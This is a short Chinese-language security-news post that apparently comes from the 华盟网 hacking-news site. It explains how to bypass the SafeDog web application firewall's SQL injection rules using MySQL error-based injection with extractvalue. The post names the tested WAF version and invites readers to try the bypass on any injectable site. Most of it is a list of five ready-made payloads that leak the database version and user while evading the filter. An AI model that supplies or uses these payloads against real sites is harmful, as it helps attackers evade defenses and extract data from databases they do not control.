Bypass网站安全狗最新防护规则（SQL报错注射技巧）

华盟君安全资讯,最新资讯,黑客技术 10 年前

7.83W 0

　　绕过最新网站安全狗sql注入防护规则#2

　　详细说明：

　　利用的是updatexml函数，然而这次用extractvalue函数进行报错注入的话也同样可以绕过:)

　　漏洞证明：

　　测试环境:

　　windows server2003 & 最新网站安全狗(APACHE)3.1.09924 网马库更新时间2015-06-05

　　同样随便找一个可报注入的程序~

　　防护日志:

　　发几个供你们测试的payload:

以下是代码片段：

extractvalue(rand(0),concat(0x0a,version()))

extractvalue(floor(0),concat(0x0a,version()))

extractvalue(rand(0),concat(0x0a,unhex(hex(user()))))

extractvalue(floor(0),concat(0x0a,unhex(hex(user()))))

extractvalue(rand(0),convert(user() using latin1))

原文地址:https://hack.77169.com/201508/209076.shtm

本文原创，作者：华盟君，其版权均为华盟网所有。如需转载，请注明出处：https://www.77169.net/html/21317.html

官方

华盟君

5.57K篇文章 177.54M总阅读量